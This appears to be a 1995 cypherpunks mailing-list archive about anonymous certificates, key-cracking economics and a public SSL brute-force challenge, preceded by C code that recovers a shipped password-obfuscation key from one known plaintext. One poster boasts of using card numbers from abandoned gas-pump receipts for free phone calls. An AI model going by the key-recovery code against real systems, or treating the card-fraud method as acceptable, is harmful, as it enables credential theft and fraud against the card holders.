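static const unsigned char DEMO_KEY[KEYLEN] = { 17, 3, 88, 41, 5, 60, 29, 73 };

/* out[i] = LO + ((plain[i] - LO) + key[i mod KEYLEN]) mod SPAN.
 * `plain` must contain only characters in 32..127. */
void obfuscate(const char *plain, const unsigned char *key, char *out)
{
    size_t i, n = strlen(plain);
    for (i = 0; i < n; i++)
        out[i] = (char)(LO + ((plain[i] - LO) + key[i % KEYLEN]) % SPAN);
    out[n] = '\0';
}

/* Inverse of obfuscate() for a known key. */
void deobfuscate(const char *cipher, const unsigned char *key, char *out)
{
    size_t i, n = strlen(cipher);
    for (i = 0; i < n; i++)
        out[i] = (char)(LO + ((cipher[i] - LO) - key[i % KEYLEN] + SPAN) % SPAN);
    out[n] = '\0';
}

/* Known-plaintext recovery: one probe password and its stored form give
 * key[i] = (cipher[i] - plain[i]) mod SPAN for every position covered.
 * Returns the number of key bytes recovered. */
size_t recover_key(const char *probe_plain, const char *probe_cipher,
                   unsigned char *key_out)
{
    size_t i, n = strlen(probe_plain);
    if (n > KEYLEN)
        n = KEYLEN;
    for (i = 0; i < n; i++)
        key_out[i] = (unsigned char)((probe_cipher[i] - probe_plain[i] + SPAN) % SPAN);
    return n;
}

int main(void)
{
    char stored[32], probe[32], recovered[32];
    unsigned char key[KEYLEN];

    /* A user's password as it would sit in the .ini file (constructed). */
    obfuscate("hunter2!", DEMO_KEY, stored);

    /* Steps 1 and 2 of the post: store a known password, subtract it. */
    obfuscate("00000000", DEMO_KEY, probe);
    recover_key("00000000", probe, key);

    /* The key does not depend on any secret, so it opens every entry. */
    deobfuscate(stored, key, recovered);
    printf("stored form: %s\nrecovered:   %s\n", stored, recovered);
    return strcmp(recovered, "hunter2!") != 0;
}
```

Because the key ships inside the program, read access to the .ini file is equivalent to read access to the password; the file's permissions are the only real control.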




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sat, 19 Aug 95 16:19:59 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <v02130505ac5c202162f8@[199.117.100.12]>
MIME-Version: 1.0
Content-Type: text/plain


The certificate gets their messages into systems that demand a
certification, whether for transport or display.

>But this is precisely the issue: what does the *certificate* get any of
>these people that a simple digital signature does not provide?
>
>On Sat, 19 Aug 1995, Rich Salz wrote:
>
>> I think there are many people who might be willing to use an
>> "anon CA" should it exist:
>>       Whistleblowers, perhaps Deep Throat would have used email
>>       People writing letters to the editor who don't want to trust
>>               the editor to withhold their info
>>       People who desire anonymity yet don't want to trust the gov't
>>               to certify their communications as authentic/forged
>>               (Unabomber, Aum Shinrikyo)
>>       Any number of writers who have used pseudonyms and now want to
>>               get paid in ecash; Mark Twain?
>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 19 Aug 95 09:36:29 PDT
To: cypherpunks@toad.com
Subject: Costs of Credit Card Fraud and Brute-Force Codebreaking
Message-ID: <199508191631.SAA10338@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net wrote:
>I think a lot of people miss the distinction between automated message
>cracking and dumpster diving.  Dumpster diving is not free.  It costs at
>least a dollar each to get credit card slips by dumpster diving.
>
>Consider that in order to use the information, you have to get the slip,
>pull off the numbers, enter them into a computer (or even worse yet,
>create a phoney card or make a phone call) in order to use the
>information.  The break-even point for an automated cracking and usage
>system is more than a dollar per stolen card.  My parallel processor
>is actually more cost effective for criminal theft via credit card fraud.

Well, a few years ago I partially satisfied my phone-phreaking habit in
the following manner:
I would walk up to a busy intersection in a commercial area and stroll
through the various gas stations located there, collecting receipts
that careless customers had forgotten to take with them after using the
"pay-at-the-pump".  Then I would visit the pay phones at the nearby
mini-malls.  It sure didn't cost me a dollar a number.

The cost/value of a card number depends a lot on what you seek to gain.
If it's free phone calls, your costs are basically nil.  If you want
free gas, it'll cost you $500 or so for the card reader/writer and a
few old cards.  If you have a system for extracting thousands of dollars
from each card, economics of scale would probably justify the $10000
rc4-breaker.  ...or you could just hack netcom, steal the mother lode
and be set for life...  (Hi Kevin!  drop me a line when you get out;
ya gotta love those plea-bargains - 30 year sentence reduced to 8
months! ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:06 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: please check my config file
Message-ID: <18468.9508191922@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



As you may have surmised Hal has given us another challenge to satisfy
the people who want to do a challenge to see *how fast* they can do it
by involving as many people and their computers as possible.

Here's my take on interpreting Hal's data to come up with a
configuration file.

I think the challenge file should look like this:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Below I will give my reasoning for each field.  Each field as it is
derived will be quoted with >>>

Could a few people check that I have made no mistakes?

Please check, thanks.

Adam


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

A break down of Hal's challenge, could someone please check my logic
in deriving an Andrew Roos style config file for brutessl 1.0 and
check my interpretation against Hal's interpretation in the previous
challenge.

----------------------------------------------------------------------

First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 


0x80 0x1c       Length field: 28 bytes follow in the packet.
0x01            MSG_CLIENT_HELLO
0x00 0x02       CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00       SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10       CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80  CIPHER-SPECS-DATA
                SESSION-ID-DATA
0x07 .. 0xc6	CHALLENGE-DATA [16 bytes]

CHALLENGE is:


>>> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6


First message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

This is interpreted as follows:

0x82 0x14       Packet length, 532 bytes follow.
0x04            MSG-SERVER-HELLO
0x00            SESSION-ID-HIT
0x01            CERTIFICATE-TYPE
0x00 0x02       SERVER-VERSION-MSB SERVER-VERSION-LSB
0x01 0xf6       CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10       CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0x8a     CERTIFICATE-DATA [502 bytes]
0x02 0x00 0x80  CIPHER-SPECS-DATA
0xd5...0xa4     CONNECTION-ID-DATA [16 bytes]

CONNECTION-ID is:

>>> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

This is interpreted as follows:

0x80 0x55       Packet length, 85 bytes follow.
0x02            MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80  CIPHER-KIND
0x00 0x0b       CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40       ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00       KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0xfb...0x36     CLEAR-KEY-DATA [11 bytes]
0x5a...0x2a     ENCRYPTED-KEY-DATA [64 bytes]
                KEY-ARG-DATA

So CLEAR-MASTER is:

>>> CLEAR-MASTER     fbc009916010a6153f8f36


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

This is interpreted as follows:

0x80 0x21       Packet length, 33 bytes follow
0x9a...0x82     RC4 encrypted MAC [16 bytes]
0x00            RC4 encrypted MSG-SERVER-VERIFY (0x05)
0x65...0x1b     RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
                [16 bytes]


Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0x07 0xea 0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f
0xc6 

Ciphertext (from SERVER-VERIFY packet):

0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2 0x33 0xb2
0x1b

SERVER-VERIFY is the encrypted MSG-SERVER-VERIFY plus the first seven
bytes of the encrypted CHALLENGE-DATA:

>>> SERVER-VERIFY      006599b6d2f2a736



So the completed challenge file is:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Adam
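
Added example (not part of Adam's message and not brutessl code): a Python parser that re-derives the four parameter-file values from the handshake records quoted above and reports how much of the master key CLIENT-MASTER-KEY sends in the clear. Assumptions: the 502-byte certificate is replaced by a zero-filled placeholder, the function names are made up for this example, and the 16-byte master key length for cipher kind 02 00 80 comes from the SSL 2.0 specification rather than from the message.

```python
import struct

MAC_LEN = 16  # MD5 MAC that precedes the data in an encrypted record

# Records as printed in the message. The 502-byte certificate is replaced by
# zero bytes (constructed placeholder); only its length matters here.
CLIENT_HELLO = bytes.fromhex(
    "80 1c 01 00 02 00 03 00 00 00 10 02 00 80 07 ea"
    "7b 9d 65 eb 61 fa bb 41 74 e8 45 3a 5f c6")
SERVER_HELLO = (
    bytes.fromhex("82 14 04 00 01 00 02 01 f6 00 03 00 10")
    + bytes(502)
    + bytes.fromhex("02 00 80 d5 e6 38 d6 8c a8 a1 ae ca 2e f8 c8 e2 96 02 a4"))
CLIENT_MASTER_KEY = bytes.fromhex(
    "80 55 02 02 00 80 00 0b 00 40 00 00 fb c0 09 91"
    "60 10 a6 15 3f 8f 36 5a 19 06 8e 58 c4 fa d0 73"
    "d4 6d 20 97 2f 85 95 b3 a5 97 b5 e0 63 91 61 b7"
    "76 3c 4e 62 8b 02 2b 05 98 d4 14 44 63 f3 43 7e"
    "a0 a8 3f 16 b2 43 4b 24 76 ae ba 8c 89 71 de 25"
    "6b ce 89 77 8a 30 2a")
SERVER_VERIFY = bytes.fromhex(
    "80 21 9a c5 f7 d1 6a 5b 26 43 57 67 65 b6 3f 9a"
    "e3 82 00 65 99 b6 d2 f2 a7 36 a0 7d d9 94 cf e2"
    "33 b2 1b")


class ParseError(ValueError):
    """Raised when a record does not match the SSLv2 layout."""


def record_body(packet):
    """Check the 2-byte record header (high bit set, no padding) and strip it."""
    if len(packet) < 2 or not packet[0] & 0x80:
        raise ParseError("expected a 2-byte SSLv2 record header")
    length = ((packet[0] & 0x7F) << 8) | packet[1]
    if length != len(packet) - 2:
        raise ParseError(f"header says {length} bytes, {len(packet) - 2} present")
    return packet[2:]


def parse_handshake(packet, msg_type, fmt):
    """Unpack the fixed header, then cut the three variable-length fields.

    In all three cleartext handshake messages the last three items of the
    fixed header are the lengths of the three data fields that follow it.
    """
    body = record_body(packet)
    size = struct.calcsize(fmt)
    if len(body) < size or body[0] != msg_type:
        raise ParseError(f"not a well-formed message of type {msg_type}")
    fixed = struct.unpack_from(fmt, body)
    fields, offset = [], size
    for n in fixed[-3:]:
        fields.append(body[offset:offset + n])
        offset += n
    if offset != len(body):
        raise ParseError("declared field lengths do not match the record length")
    return fixed, fields


def brute_params(client_hello, server_hello, master_key, server_verify):
    """Return the four parameter-file values as lowercase hex strings."""
    _, (_, _, challenge) = parse_handshake(client_hello, 0x01, ">BHHHH")
    _, (_, _, connection_id) = parse_handshake(server_hello, 0x04, ">BBBHHHH")
    _, (clear_key, _, _) = parse_handshake(master_key, 0x02, ">B3sHHH")
    # SERVER-VERIFY is encrypted: MAC, then message type byte, then challenge.
    enc = record_body(server_verify)
    if len(enc) != MAC_LEN + 1 + len(challenge):
        raise ParseError("SERVER-VERIFY has an unexpected length")
    return {
        "CLEAR-MASTER": clear_key.hex(),
        "CHALLENGE": challenge.hex(),
        "CONNECTION-ID": connection_id.hex(),
        # encrypted type byte plus the first seven encrypted challenge bytes
        "SERVER-VERIFY": enc[MAC_LEN:MAC_LEN + 8].hex(),
    }


def key_exposure(master_key, master_key_len=16):
    """Return (clear_bits, secret_bits) for a CLIENT-MASTER-KEY record.

    master_key_len=16 is an assumption taken from the SSL 2.0 specification
    for cipher kind 02 00 80 (RC4, 128-bit key, 40 bits secret).
    """
    _, (clear_key, _, _) = parse_handshake(master_key, 0x02, ">B3sHHH")
    clear_bits = 8 * len(clear_key)
    return clear_bits, 8 * master_key_len - clear_bits


if __name__ == "__main__":
    params = brute_params(CLIENT_HELLO, SERVER_HELLO,
                          CLIENT_MASTER_KEY, SERVER_VERIFY)
    for name, value in params.items():
        print(f"{name:<16} {value}")
    print("clear/secret key bits:", key_exposure(CLIENT_MASTER_KEY))
```
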





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:01 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: volunteers to compile brutessl for a few platforms
Message-ID: <18518.9508191936@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Could someone with a few things handy compile Andrew Roos's code so that
we have a nice handy pre-compiled DOS binary.

A must will be a DOS binary, what other platforms?

	- DOS (Need Microsoft visual C++ I think this is what Andrew used,
		there is an assembler speed up file)

	- OS/2?

	- PowerPC + MAC?

Any other architecture you would like to see a binary made available
for.

Please send binary to Piete (cc line) or me, and it would be nice if
you could provide a detached PGP signature also.

The tar file is at:

	http://dcs.ex.ac.uk/~aba/brutessl.tar.gz

There is a pointer to brutessl.tar.gz.  You'll need to use save next
link ( "shift and click" on URL in netscape 1.1 ), or whatever
mechanism your browser provides.

You'll also need TAR.EXE and GZIP.EXE for DOS to unpack a .tar.gz file.

In case this is a problem I have just created this:

	http://dcs.ex.ac.uk/~aba/brutessl/

containing these files:

   2 -rw-r--r--    1 aba      phd          439 Jul 31 11:14 Makefile
   2 -rw-r--r--    1 aba      phd          602 Jul 31 17:19 README
  34 -rw-r--r--    1 aba      phd        16450 Jul 31 17:20 assembly.c
  42 -rw-r--r--    1 aba      phd        21373 Jul 31 17:21 brutessl.c
   6 -rw-r--r--    1 aba      phd         2776 Jul 31 17:21 brutessl.h
  26 -rw-r--r--    1 aba      phd        12709 Jul 31 17:21 brutessl.txt
   2 -rw-r--r--    1 aba      phd          351 Aug 19 20:31 chal2.pf
   2 -rw-r--r--    1 aba      phd          264 Jul 31 17:21 chal1.pf
  34 -rw-r--r--    1 aba      phd        16500 Jul 31 17:22 search.c
   2 -rw-r--r--    1 aba      phd          296 Jul 31 17:22 test.pf

You should be able to access them individually as:

	http://dcs.ex.ac.uk/~aba/brutessl/Makefile

etc.

(just in case you can't handle TAR / GZIP files on your DOS machine).

chal1.pf is the challenge that Damien just broke, chal2.pf is my first
attempt at producing a challenge file for Hal's next challenge.

The challenge info will be at:

	http://www.brute.cl.cam.ac.uk/brute/

when it starts.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 19 Aug 95 18:11:31 PDT
To: cypherpunks@toad.com
Subject: Spooks and Hackers, etc.
Message-ID: <Pine.SOL.3.91.950819210419.18364G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Subject: Internet Police

According to an AP story, Wisconsin Attorney General James Doyle says that
police must monitor the Internet to stop child porn, drug trafficking, and
fraud.

"We need to see that police are surfing the Internet just as other people
are," Doyle said. "This is a good example of where the law is slower than
technology."

Doyle made his comments in a speech to the Wisconsin Chiefs of Police
Association Conference.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:01 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action
Message-ID: <18599.9508192006@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Okay this is a bit awkward because Piete doesn't appear to be in today,
but there are a few things which need doing first (compiling which I
mentioned in the previous message, and a 2nd opinion on the config
file which I posted in the previous message to that), so perhaps this
is not a problem.

What we want to do (what I want to do!) with this latest challenge of
Hal's is to try to see how fast it can be brute forced.  To this end
we need a kind of starting line effect, so everyone gets their
software, and has it tested as running correctly.  People using the
socket doler have their clients ticking over, people using the WWW
browser have their fingers poised over the button etc, and then Piete
(when he gets back, let's say Monday 12:00 GMT to be safe, he can
amend that time later if necessary when he next gets on line) will
start the race.

Sound like a good plan?

Where to find things...

The brutessl software, the unix socket client, and the Windows NT
client are on:

	http://www.brute.cl.cam.ac.uk/brute/

Also I have (temporarily, until Piete has a chance to update
www.brute.cl.cam.ac.uk) the brutessl code here:

	http://dcs.ex.ac.uk/~aba/brutessl/

(both TAR file, and individual files untarred).

If and when people compile binaries for architectures which don't
typically come with compilers by default - such as DOS, OS/2, Macs,
I'll put any binaries sent to me in this directory.  When Piete gets
back, he'll either make a pointer to this repository, or copy it on to
www.brute.


UNIX client.

How to use the unix client...  download brclient from the www page:

	http://www.brute.cl.cam.ac.uk/brute/

it is a perl program so you may have to edit the path to perl (the 1st
line of the program should be #!/full/path/to/perl/binary), and you
will have to mark it as executable.

You will also need a shell script called brloop which uses brclient.
It is on Piete's "sources" page, this page is indexed from the main
brute page above, here it is explicitly.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/README.html

So get brloop.

Get and compile the brutessl.tar.gz file.

Run brloop.

The brclient perl socket client talks to a machine with a DNS:

	sksp.brute.cl.cam.ac.uk on port number 19957

At the moment the server is not running so it will fail, but when
Piete starts it up, your client will periodically ask for work, before
the start time (Monday 12:00 GMT, or later time if this time is
changed) your client will just be told to sleep for a while, when it
wakes up it will ask for work again.  In this way the client can be
left ticking over, when work does arrive it will notice, as it will
actually receive some work when it makes the request, and start doing
it, and reporting back when it finishes each chunk.

For a more detailed description of the socket protocol that Piete's
brclient will talk to the key server, have a look at this document
"SKSP Simple Key Searching Protocol" an SMTP like protocol for
requesting keys to search, and reporting back the results.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt

(This is indexed from the main www.brute page under "new protocol".)


There is a windows NT socket client written by Andrew Brown, pointers
to that also.


If you want to write a socket client for another architecture (someone
mentioned PowerPC?) the protocol is reasonably straight forward, and
documented in the protocol.txt file above.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 19 Aug 95 19:16:18 PDT
To: cypherpunks@toad.com
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
Message-ID: <199508200224.VAA11815@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>your assessment that this cost our anon friend some money to obtain 
>these cc numbers is simply not true.  when you have nothing else to do, 
>choosing one thing over another involves no cost.  if anything, he made 
>money by using the cc numbers to make long dist calls instead of using 
>any cash he might have from working or an allowance.
>
>my $0.02,
>

There's also the factor that the dumpster diver is - if s/he continues the
practise in a certain area - going to learn which dumpsters are more likely
to contain valuta, thus reducing the 'overhead'.

My ha'penny :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDZ9h8VrTvyYOzAZAQGQvgP+L/Zq5BChW1Y3ZkN5N0XCe2fw/QbWrgtt
2/6Mxdpg96ureHYfaPaxDTxstCC9pTyD6lrOqkCeu5/Pr/GZ8FFPRzPOx1xDdqmO
iufGGeUzRqcTcqRjOFBkBJ9GcZLgsZ3FZ4XtCCwQZ7w5aumBnA8xvfoP7DgCRrp1
55noMpWFwmk=
=g27w
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Sat, 19 Aug 95 21:33:12 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <199508190800.BAA26793@ix9.ix.netcom.com>
Message-ID: <199508200433.VAA07070@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Bill" == Bill Stewart <stewarts@ix.netcom.com> writes:

    > Alternatively, you could do a model where everybody gets paid,
    > but only after the answer is found, which discourages scammers
    > (since they don't get paid if they lie about searching the range
    > that has the real key.)  If a Bad Guy lies about the key not
    > being in his range, people do have an incentive to look for it
    > if the first pass fails, and have an incentive to finger him if
    > they do find the key on a later pass.  

But the scammer who has done his or her math homework will recognize
that it's reasonably unlikely that his or her assigned range contains
the true key (depending, of course, on the size of the assigned
range...).  Thus, on the average, if everyone gets paid, a scammer
will make money by not actually searching the range assigned (perhaps
actually using the CPU time on a different key search).

I think it'd also be important to reward those who throw more compute
power at the task more than those who just sic a desktop on the job.
This is handled elegantly by the first method -- the person who
dedicates some giant supercomputer to the task is that much more
likely to find the key and be rewarded...

-sq






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 19 Aug 95 21:53:55 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <8AF7577.0003000342.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> This happens all the time, though "I am not a lawyer," in disputes about
TC> whether a contract was signed properly, about whether the signer had the
TC> right authority, etc. And it is apparently not necessary to have the
TC> "state" establish itself, for example, as the keeper of signatures.

  But the state does establish Notaries Public, and courts put special
credence in the validity of signatures witnessed by them. Which is to be
expected, of course, having the King's X being good in the King's
courts.

  I don't see this as an either/or binary at all. To me, the natural
thing to do is for a person who is already a Notary under the laws of a
state to offer digital notary services. I would expect the State of
California or Commonwealth of Massachusetts to have the Secretary of
State's office (or whoever is in charge of Notary Credentials there) to
digitally sign the public keys of any Notaries commissioned thereby.

  In fact, I would like to see provision made for a digital signature to
have an expiration date included, so that the SoS office could have its
signature on a key set to expire along with the Notary's commission.

  Thus the existing state framework for verification of identity and
consent on contracts is extended into the electronic sphere seamlessly.
None of which prevents you or I from doing business without the services
of the Royal Notary.


 * ZenCrafters - Total Enlightenment in about an hour
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Prickett <jprickett@lightlink.satcom.net>
Date: Mon, 28 Aug 95 12:43:10 PDT
To: cypherpunks@toad.com
Subject: GOST ??
